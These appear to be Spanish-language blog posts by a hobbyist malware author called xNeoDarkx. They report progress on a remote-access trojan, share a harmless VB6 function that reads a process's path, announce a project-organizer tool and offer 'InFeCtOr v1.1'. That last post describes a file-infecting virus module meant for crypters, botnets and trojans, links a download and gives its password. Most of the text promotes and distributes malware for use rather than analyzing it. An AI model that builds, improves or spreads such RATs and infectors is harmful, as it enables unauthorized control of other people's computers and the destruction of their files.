Neo Pitbull Agent RAT v2.01 "Avances"

Empezando desde cero y resolviendo todos los bugs antes de que surjan cuando ya esta todo el codigo.
He optimizado las siguientes opciones.
[+]Multi-Puerto: esta opcion asegura mas de 10000 puertos, pero vamos quien necesita tanto?? xD
[+]File-Manager Con todos los drives insertados, y navegación por accesos directos a escritorio, imagenes, etc; multi-descargas de un mismo remoto y de multiples remotos, ahora trabajo en la reanudación de una descarga, parada o pausada.
[+]GUI del Cliente La estoy poniendo guapa xD, con iconos, imagenes, etc xD.

Saludos! les traere mas avances conforme los vaya terminando
xNeoDarkx

RAT!! Proyecto Modificado

Bueno después de trabajar por un buen rato en el RAT me canse de no recordar muchas cosas pues el proyecto tiene 1 año, al principio no tenía ni la menor idea de que hacia y solo copiaba y pegaba pero conforme fui aprendiendo decidí empezarlo desde 0.

Este nuevo comienzo y después de hablar con mi colaborador y amigo del PMA (Pitbull Malware Analizer) -SlandG- le pedí me diera autorización para usar el nombre de un proyecto suyo estancado.

El nombre es Pitbull Agent Spy pero prefiero darle mi toque y ahora el xNeoDarkx RAT se ha convertido en el Neo Pitbull Spy RAT con una nueva versión base de v2.01, pues hasta ahi deje el xNeoDarkx RAT.

Ahora programaré todo desde cero y tomando en cuenta lo que he hecho conscientemente, esperen mas avances del proyecto y pronto les pondré unas capturas

Saludos!
xNeoDarkx

Obtener Ruta de Procesos

Trabajaba en mi RAT, mejorando el listado de procesos y decidí ponerle la ruta de los procesos.
Investigando un poco y con el conocimiento que tenia les traigo esta función, se debe de poner en un modulo.

01 Private Declare Function GetModuleFileNameEx Lib "PSAPI.DLL" Alias "GetModuleFileNameExA" (ByVal hProcess As Long, ByVal hModule As Long, ByVal ModuleName As String, ByVal nSize As Long) As Long
02 Private Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long
03 Private Declare Function CloseHandle Lib "Kernel32.dll" (ByVal Handle As Long) As Long
04 Private Declare Function EnumProcessModules Lib "PSAPI.DLL" (ByVal hProcess As Long, ByRef lphModule As Long, ByVal cb As Long, ByRef cbNeeded As Long) As Long
05
06 Private Const MAX_PATH As Long = 260
07 Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
08
09
10 Private Function GetPathPID(pID As Long) As String
11 Dim lHandle As Long
12 Dim lEpID As Long
13 Dim lModule(250) As Long
14 Dim lByNeed As Long
15 Dim sPrName As String
16 Dim lSize As Long
17
18 lHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, pID)
19
20 If lHandle = 0 Then Exit Function
21 lEpID = EnumProcessModules(lHandle, lModule(1), MAX_PATH, lByNeed)
22
23 If lEpID = 0 Then Exit Function
24 sPrName = Space(MAX_PATH)
25 lSize = MAX_PATH
26
27 lEpID = GetModuleFileNameEx(lHandle, lModule(1), sPrName, lSize)
28 sPrName = Trim(Left(sPrName, lEpID))
29
30 lEpID = CloseHandle(lHandle)
31
32 GetPathPID = sPrName
33 End Function

Les explico un poco como lo hace:
[+]La API, GetModuleFileNameEx lo que hace es obtener la ruta, apartir de un handle del proceso y un modulo.
[+]la API, OpenProcess devuelve el handle a partir del pID del proceso(Process ID), se puede especificar apartir de demás APIs.
[+]La API, CloseHandle cierra el handle que hemos usado.
[+]La API, EnumProcessModules devuelve un array de los modulos del proceso.
[+]La constante, PROCESS_ALL_ACCESS sirve para tener acceso al proceso y asi la API devuelve el handle del proceso
[+]La constante, MAX_PATH una constante para minimizar el uso de numero xD.

Solo necesitan especificar el pID del proceso y les devolverá la ruta

Saludos!
xNeoDarkx

NeoTeca v0.1, Regalo de Navidad

Bueno les traigo un regalito de navidad.
Queria regalarles algo que les fuera util a todos pero no se pudo =/, espero les sea util como a mi me lo esta siendo. Sobre todo a los Codders

¿Que demonios es NeoTeca?? Pues es un programa que organiza y almacena informacion de los proyectos
[+]Lenguajes que soporta
-Delphi
-VB6
-C/C++
[+]Notas por proyecto
[+]Visualizacion de codigo
[+]Informacion de archivo
[+]Abrir en editor predeterminado
[+]Abrir carpeta de archivo
[+]Multilenguaje (por defecto trae español e ingles, pero solo traduzcan y guarden como .ini y todo funcionará)


Les dejo unas capturas


Lo probe en W7 y XP SP3, repare todos los Bugs que encontre xD
Pero ya saben aqui estoy para cualquier cosa

Cliente (Contiene dos carpetas y el programa): http://www.multiupload.com/2GDIC83QDN
No-Pass xD

Saludos!!

PD: si quieren que le agregue mas lenguajes envíenme proyectos del lenguaje para estudiar la estructura

InFeCtOr v1.1

Les presento un modulo en vb6 que se puede agregar a su crypter, botnet, RAT, Troyano, etc.

Lo que hace este modulo es infectar archivos con la extension que ustedes deseen viene por Default "exe" pero pueden infectar "Exe", "Bat", "Com" y con algunas modificaciones "msi" (Archivos Setup).



Lo explicaré de manera breve al iniciar el programa lo llamaremos "Virus", Este lee todos los archivos y si su extensión es la que ustedes han seleccionado procede a infectarlo abriendolo binariamente copiando su codigo, eliminando el archivo "Victima" despues lo vuelve a crear, pero esta vez con el codigo del "Virus" y el codigo de la "Victima".

Es altamente peligroso por lo que les recomiendo probarlo en una virtual, no me hago responsable por archivos infectados sin su consentimiento

http://www.multiupload.com/M2SMCRWEGQ

Pass: xNeoDarkx